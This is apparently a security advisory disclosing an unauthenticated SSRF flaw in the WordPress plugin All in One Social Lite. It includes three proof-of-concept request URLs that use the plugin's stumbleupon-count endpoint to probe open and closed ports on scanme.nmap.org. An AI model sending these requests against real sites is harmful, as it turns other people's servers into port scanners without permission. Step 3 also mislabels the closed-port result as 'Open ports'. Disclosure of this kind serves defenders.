Wp Plugin All in One Social Lite

Plugin Details

Plugin Name: wp-plugin : all-in-one-social-lite
Effected Version : 1 (and most probably lower version's if any)
Vulnerability : ssrf
Minimum Level of Access Required : Unauthenticated
CVE Number :
Identified by : Prajalkulkarni
WPScan Reference URL

Disclosure Timeline

Technical Details

For the purpose of demonstration we used scanme.nmap.org where port 80 and 22 are open and 21 is closed.

1. Test for Open port 80 :http://localhost/wordpress/wp-content/wp-plugs/all-in-one-social-lite/ajax-cube3x-stumpleupon-count.php?url=scanme.nmap.org:80The “in_index” Key value is “true” for Open ports(Check- OpenPort80.png) 2. Test for Open NON HTTP Ports (like SSH, FTP, SMTP etc) :http://127.0.0.1/wordpress/wp-content/wp-plugs/all-in-one-social-lite/ajax-cube3x-stumpleupon-count.php?url=scanme.nmap.org:22The “in_index” Key value is “true” for Open ports(Check OpenPort22.png)

3. Test for Closed Port 21:http://localhost/wordpress/wp-content/wp-plugs/all-in-one-social-lite/ajax-cube3x-stumpleupon-count.php?url=scanme.nmap.org:21The “in_index” Key value is “false” for Open ports(Check ClosedPort21.png)